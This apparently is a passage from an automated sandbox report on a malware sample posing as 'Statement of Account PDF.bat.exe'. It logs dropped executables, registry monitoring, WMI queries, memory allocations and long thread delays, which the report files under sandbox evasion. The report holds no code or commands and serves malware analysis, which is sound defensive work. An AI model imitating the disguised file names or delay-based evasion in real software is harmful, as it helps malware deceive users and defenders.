                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara matchFile source: Process Memory Space: Statement of Account PDF.bat.exe PID: 6984, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: gDdsxauPhk.exe PID: 7440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 8032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7400, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: EF0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 2940000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 26D0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 8F50000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 78F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 9F50000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: AF50000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: B480000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 8F50000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 1010000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 2F60000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: 2CC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 7F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 2540000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 2260000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 8160000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 9160000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 9350000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: A350000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: A940000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 8160000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 1400000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 3030000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory allocated: 2E60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: FE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2BD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 1270000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 89F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 99F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 9BE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: ABE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: B140000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: C140000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: D140000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 1640000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 34F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 1940000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: E80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2A40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 27A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 8710000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 9710000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 9900000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: A900000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: AF80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: BF80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: CF80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2610000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2900000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 4900000 memory reserve | memory write watch
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1200000
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199874
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199765
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199656
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199546
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199437
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199328
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199214
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199109
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198999
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198890
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198781
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198671
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198551
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198421
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198312
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198192
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198062
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1197952
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1197839
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1197733
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1197624
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1197514
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1200000
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199887
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199770
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199637
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199527
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199418
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199308
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199199
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199090
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198980
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198871
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198746
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198595
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198465
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198355
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198245
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198136
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198027
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197918
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197808
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197691
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197558
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197415
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197257
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197142
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1196894
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1196150
